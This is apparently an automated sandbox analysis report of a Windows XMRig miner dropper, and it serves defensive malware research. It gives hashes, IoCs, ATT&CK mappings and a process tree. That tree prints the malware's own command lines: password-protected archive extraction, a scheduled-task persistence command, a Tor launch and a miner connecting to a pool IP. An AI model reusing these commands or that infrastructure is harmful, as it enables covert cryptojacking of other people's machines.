xmrig | ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc

Resubmissions

09/04/2024, 09:54

240409-lxl35sca92 10

09/04/2024, 09:54

09/04/2024, 09:54

09/04/2024, 09:54

04/02/2024, 03:40

Analysis

max time kernel
257s
max time network
301s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
04/02/2024, 03:40

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
Size

15.9MB
MD5

d4e64ab0ff97f98ee52336a12f8a866b
SHA1

142dbab8c142028dee1246406f00d78ee996a928
SHA256

ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc
SHA512

2930de9b2ffca5225d94d24029fdd2cbfc1d71602aff4d85ddbb6d0d54121e6da5d48c773b152753a67ef9e2d97e63d867955024bd5587e7fed7339e3bece7e0
SSDEEP

393216:kIGjY9luLMWNVAgidNUDUDeElrCakFLrffXZh5:JGj4lu4WfAgSUDYrCRFvN

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral1/memory/2156-3547-0x0000000000210000-0x0000000000CFF000-memory.dmp	xmrig

Executes dropped EXE 18 IoCs

pid	Process
2776	CL_Debug_Log.txt
2036	Helper.exe
1284	Helper.exe
1688	Helper.exe
2828	Helper.exe
2836	tor.exe
1620	Helper.exe
952	Helper.exe
2160	Helper.exe
1968	Helper.exe
1740	Helper.exe
2908	Helper.exe
1152	Helper.exe
2256	Helper.exe
2248	Helper.exe
1948	Helper.exe
932	Helper.exe
2868	Helper.exe

Loads dropped DLL 12 IoCs

pid	Process
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2608	taskeng.exe
2608	taskeng.exe
1096	Process not Found
1688	Helper.exe
1688	Helper.exe
2836	tor.exe
2836	tor.exe
2836	tor.exe
2836	tor.exe
2836	tor.exe
2836	tor.exe

AutoIT Executable 26 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0007000000014719-23.dat	autoit_exe
behavioral1/files/0x003300000001444d-29.dat	autoit_exe
behavioral1/files/0x00080000000148b8-32.dat	autoit_exe
behavioral1/files/0x00080000000148b8-31.dat	autoit_exe
behavioral1/files/0x00080000000148b8-37.dat	autoit_exe
behavioral1/files/0x00080000000148b8-36.dat	autoit_exe
behavioral1/files/0x00080000000148b8-35.dat	autoit_exe
behavioral1/files/0x00080000000148b8-34.dat	autoit_exe
behavioral1/files/0x00080000000148b8-38.dat	autoit_exe
behavioral1/files/0x00080000000148b8-46.dat	autoit_exe
behavioral1/files/0x00080000000148b8-45.dat	autoit_exe
behavioral1/files/0x00080000000148b8-149.dat	autoit_exe
behavioral1/files/0x00080000000148b8-148.dat	autoit_exe
behavioral1/files/0x00080000000148b8-150.dat	autoit_exe
behavioral1/files/0x00080000000148b8-209.dat	autoit_exe
behavioral1/files/0x00080000000148b8-210.dat	autoit_exe
behavioral1/files/0x00080000000148b8-211.dat	autoit_exe
behavioral1/files/0x00080000000148b8-212.dat	autoit_exe
behavioral1/files/0x00080000000148b8-1487.dat	autoit_exe
behavioral1/files/0x00080000000148b8-1488.dat	autoit_exe
behavioral1/files/0x00080000000148b8-1489.dat	autoit_exe
behavioral1/files/0x00080000000148b8-3121.dat	autoit_exe
behavioral1/files/0x00080000000148b8-3118.dat	autoit_exe
behavioral1/files/0x00080000000148b8-3125.dat	autoit_exe
behavioral1/files/0x00080000000148b8-3513.dat	autoit_exe
behavioral1/files/0x00080000000148b8-3512.dat	autoit_exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1688 set thread context of 2828	1688	Helper.exe	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1356	schtasks.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\winmgmts:\CALKHSYM\root\CIMV2	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\CALKHSYM\root\CIMV2	Helper.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeRestorePrivilege	2776	CL_Debug_Log.txt
Token: 35	2776	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2776	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2776	CL_Debug_Log.txt
Token: SeRestorePrivilege	2828	Helper.exe
Token: 35	2828	Helper.exe
Token: SeSecurityPrivilege	2828	Helper.exe
Token: SeSecurityPrivilege	2828	Helper.exe

Suspicious use of FindShellTrayWindow 48 IoCs

pid	Process
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2036	Helper.exe
2036	Helper.exe
2036	Helper.exe
1284	Helper.exe
1284	Helper.exe
1284	Helper.exe
1688	Helper.exe
1688	Helper.exe
1688	Helper.exe
952	Helper.exe
1620	Helper.exe
952	Helper.exe
952	Helper.exe
1620	Helper.exe
1620	Helper.exe
2160	Helper.exe
2160	Helper.exe
2160	Helper.exe
1740	Helper.exe
1740	Helper.exe
1740	Helper.exe
1968	Helper.exe
1968	Helper.exe
1968	Helper.exe
1152	Helper.exe
1152	Helper.exe
1152	Helper.exe
2908	Helper.exe
2908	Helper.exe
2908	Helper.exe
2248	Helper.exe
2256	Helper.exe
2248	Helper.exe
2248	Helper.exe
2256	Helper.exe
2256	Helper.exe
1948	Helper.exe
1948	Helper.exe
1948	Helper.exe
2868	Helper.exe
2868	Helper.exe
2868	Helper.exe
932	Helper.exe
932	Helper.exe
932	Helper.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
2036	Helper.exe
2036	Helper.exe
2036	Helper.exe
1284	Helper.exe
1284	Helper.exe
1284	Helper.exe
1688	Helper.exe
1688	Helper.exe
1688	Helper.exe
952	Helper.exe
952	Helper.exe
952	Helper.exe
1620	Helper.exe
1620	Helper.exe
1620	Helper.exe
2160	Helper.exe
2160	Helper.exe
2160	Helper.exe
1740	Helper.exe
1740	Helper.exe
1740	Helper.exe
1968	Helper.exe
1968	Helper.exe
1968	Helper.exe
1152	Helper.exe
1152	Helper.exe
1152	Helper.exe
2908	Helper.exe
2908	Helper.exe
2908	Helper.exe
2248	Helper.exe
2256	Helper.exe
2248	Helper.exe
2248	Helper.exe
2256	Helper.exe
2256	Helper.exe
1948	Helper.exe
1948	Helper.exe
1948	Helper.exe
2868	Helper.exe
2868	Helper.exe
2868	Helper.exe
932	Helper.exe
932	Helper.exe
932	Helper.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2928 wrote to memory of 2776	2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe	30
PID 2928 wrote to memory of 2776	2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe	30
PID 2928 wrote to memory of 2776	2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe	30
PID 2928 wrote to memory of 2776	2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe	30
PID 2928 wrote to memory of 2924	2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe	33
PID 2928 wrote to memory of 2924	2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe	33
PID 2928 wrote to memory of 2924	2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe	33
PID 2928 wrote to memory of 2924	2928	ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe	33
PID 2924 wrote to memory of 1356	2924	cmd.exe	32
PID 2924 wrote to memory of 1356	2924	cmd.exe	32
PID 2924 wrote to memory of 1356	2924	cmd.exe	32
PID 2924 wrote to memory of 1356	2924	cmd.exe	32
PID 2608 wrote to memory of 2036	2608	taskeng.exe	36
PID 2608 wrote to memory of 2036	2608	taskeng.exe	36
PID 2608 wrote to memory of 2036	2608	taskeng.exe	36
PID 2608 wrote to memory of 1284	2608	taskeng.exe	35
PID 2608 wrote to memory of 1284	2608	taskeng.exe	35
PID 2608 wrote to memory of 1284	2608	taskeng.exe	35
PID 2036 wrote to memory of 1688	2036	Helper.exe	37
PID 2036 wrote to memory of 1688	2036	Helper.exe	37
PID 2036 wrote to memory of 1688	2036	Helper.exe	37
PID 1688 wrote to memory of 2828	1688	Helper.exe	38
PID 1688 wrote to memory of 2828	1688	Helper.exe	38
PID 1688 wrote to memory of 2828	1688	Helper.exe	38
PID 1688 wrote to memory of 2828	1688	Helper.exe	38
PID 1688 wrote to memory of 2828	1688	Helper.exe	38
PID 1688 wrote to memory of 2836	1688	Helper.exe	40
PID 1688 wrote to memory of 2836	1688	Helper.exe	40
PID 1688 wrote to memory of 2836	1688	Helper.exe	40
PID 2608 wrote to memory of 1620	2608	taskeng.exe	44
PID 2608 wrote to memory of 1620	2608	taskeng.exe	44
PID 2608 wrote to memory of 1620	2608	taskeng.exe	44
PID 2608 wrote to memory of 952	2608	taskeng.exe	43
PID 2608 wrote to memory of 952	2608	taskeng.exe	43
PID 2608 wrote to memory of 952	2608	taskeng.exe	43
PID 952 wrote to memory of 2160	952	Helper.exe	45
PID 952 wrote to memory of 2160	952	Helper.exe	45
PID 952 wrote to memory of 2160	952	Helper.exe	45
PID 2608 wrote to memory of 1968	2608	taskeng.exe	47
PID 2608 wrote to memory of 1968	2608	taskeng.exe	47
PID 2608 wrote to memory of 1968	2608	taskeng.exe	47
PID 2608 wrote to memory of 1740	2608	taskeng.exe	46
PID 2608 wrote to memory of 1740	2608	taskeng.exe	46
PID 2608 wrote to memory of 1740	2608	taskeng.exe	46
PID 1740 wrote to memory of 2908	1740	Helper.exe	48
PID 1740 wrote to memory of 2908	1740	Helper.exe	48
PID 1740 wrote to memory of 2908	1740	Helper.exe	48
PID 1968 wrote to memory of 1152	1968	Helper.exe	49
PID 1968 wrote to memory of 1152	1968	Helper.exe	49
PID 1968 wrote to memory of 1152	1968	Helper.exe	49
PID 2608 wrote to memory of 2256	2608	taskeng.exe	51
PID 2608 wrote to memory of 2256	2608	taskeng.exe	51
PID 2608 wrote to memory of 2256	2608	taskeng.exe	51
PID 2608 wrote to memory of 2248	2608	taskeng.exe	52
PID 2608 wrote to memory of 2248	2608	taskeng.exe	52
PID 2608 wrote to memory of 2248	2608	taskeng.exe	52
PID 2248 wrote to memory of 1948	2248	Helper.exe	53
PID 2248 wrote to memory of 1948	2248	Helper.exe	53
PID 2248 wrote to memory of 1948	2248	Helper.exe	53
PID 2608 wrote to memory of 932	2608	taskeng.exe	55
PID 2608 wrote to memory of 932	2608	taskeng.exe	55
PID 2608 wrote to memory of 932	2608	taskeng.exe	55
PID 2608 wrote to memory of 2868	2608	taskeng.exe	54
PID 2608 wrote to memory of 2868	2608	taskeng.exe	54

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2156	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe
"C:\Users\Admin\AppData\Local\Temp\ddf5992a22e591cae17174a449440242ca2d202f54c075595e3c2424a37a89bc.exe"
1⤵
- Loads dropped DLL
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2928
- C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
  C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2924

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
1⤵
- Creates scheduled task(s)
PID:1356

C:\Windows\system32\taskeng.exe
taskeng.exe {6835E4DE-0B81-41F7-9616-AA8DA57A6993} S-1-5-21-3601492379-692465709-652514833-1000:CALKHSYM\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2608
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1284
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck76498
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - NTFS ADS
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1688
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2828
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2836
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"
      4⤵
      PID:1636
  - - C:\Windows\System32\attrib.exe
      -o stratum+tcp://77.83.173.45:3333 -u -p x -t 6
      4⤵
      Views/modifies file attributes
      PID:2156
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck76498
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2160
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1620
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck76498
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2908
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1968
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck76498
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1152
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2256
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2248
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck76498
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1948
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2868
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck76498
    3⤵
    PID:2788
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\32.exe

Filesize
175KB

MD5
6fd9267a5e29174f66f2dc554e4bd9d4

SHA1
a12475a5bea0a573024464cff044b1b9ec99dbbf

SHA256
9080394ef892e9ac8f654ff3eeec4a4a6b948e80e4ee3a364aea6b09f4020b7d

SHA512
1c3fe609a5c0f4b51e0ff3cdbcf7cc5f0f04c1442dd802e7f38274edc19df02c56bca7b6afebe432e5fb9f1a0826f72cf7b0e17259976348dbe980f05a182752

Download Submit
C:\Users\Admin\AppData\Local\Temp\64.exe

Filesize
147KB

MD5
9acb77082fcd10605075d91aacd4b47d

SHA1
8c9a20b1d6dbf3abf02972c696161abba8a669d6

SHA256
444710ab4d5b29a4482aed45e636f5159ea7ba335f5a351f3d1a1a0e8313c0e0

SHA512
506060eb4b70a42a099c2d0d91c79a076bb1478c4fd5d7475558728a1123f1ce4422e2df9e147fd4805c7c7998563e95453d340c66ec8bb2ee8bd8a6b4987716

Download Submit
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt

Filesize
313KB

MD5
bac55dcc54997e9bfac13878e22152a7

SHA1
45d9e2fe611ffb64c709f5e8e7ce26d0927f079d

SHA256
1814aeeb8ecadd036d0f43aa5211e74bd0c7832dd6049e8193859a172756d2d4

SHA512
b6a5af8e3ad675a553f359b6eb90a91f045384b08cb6d3f0c85e13d5c6476b5f30e5ef381e7ab3f37976711ddc23e1121929f7c0b1279008bfec2e25d35ce31d

Download Submit
C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt

Filesize
249KB

MD5
38c0589642930e46e055ecbf63f034d1

SHA1
c24af6d04e7eb612835771abc4d1ba1c3905bb8c

SHA256
ac0d51658340c519b23cb4a440de24deb86ca26b4f599633b7ea868b2f2269b6

SHA512
2adc55ed6a3bac498bd3761bd42318015406eb396fd86088508dfffc4330e95a9d37690995d73291e2ec46c9b68563d5aa3fb47bc26245035ade47cfb2416340

Download Submit
C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml

Filesize
2KB

MD5
9160347bec74471e1a79edfd950629ae

SHA1
c149a7e5aab6e349a70b7b458d0eaaa9d301c790

SHA256
0fe356f3d04bb43f772604b049fd2b20f3038ca2ce84bf9778b8ccdd481d77ab

SHA512
b8061834f658567a1e742496c38688bdecd60191a92163d47470f64aa1fba23e92dd36fa1d2bb7efa36f14002c0606013973718b9f107e62d845a17be4b0d358

Download Submit
C:\Users\Admin\AppData\Local\Temp\asacpiex.dll

Filesize
389KB

MD5
a477a39a74091dd67d5ec53cf00ecb26

SHA1
2802243634db9bd2bf7e3b6deef48ac32b131c9f

SHA256
b4b27ba0d159c5304f79a990721c6750a7803dde862de8678e381bbbfc766b2a

SHA512
d5cc711ee1e1884c249dd4ac607a1abd599b5734ea3c2badd6c70a5d1e36a1b1f4b6a2f546ffe51c7651f2e70e5722cecc85be2a2cde46357b012820766bd14e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
292KB

MD5
929741dcd80b0b39812d7daabf156467

SHA1
fbe1b3b64d997ebedc11864228a2d30f6aa2d939

SHA256
17c3d84f760d1d3a3f9491bb4eb14170ea4edac15554f98803f38b3351a2e54f

SHA512
d7acce71c811588afd332bab65db8567a7730f835be621f64c8ad4b373bbf3e59e4102cdac52106d76c7a714744ac9b3cc8a77ec1db09c1cffd3232c22a8cd0e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
2.3MB

MD5
c045d58f8951d272de6bb2f8b578c32c

SHA1
afbeb405a1e941219b0f5aa9ea1c9de01dd980b6

SHA256
1b449914b3f72f4cc5023145c9989454dede4a6cabe723c8b82261561c775e0e

SHA512
85fc7c5526f6ccf3f3be35b9f58a1b92cdce8c2344878bda5ee460ad76e27496809e82442323ca1c5f5a37e4c529925fa6bd77f87ba2d6d313e26b1eb46a52eb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
2.4MB

MD5
68903ece588369e9af23023946bc6d85

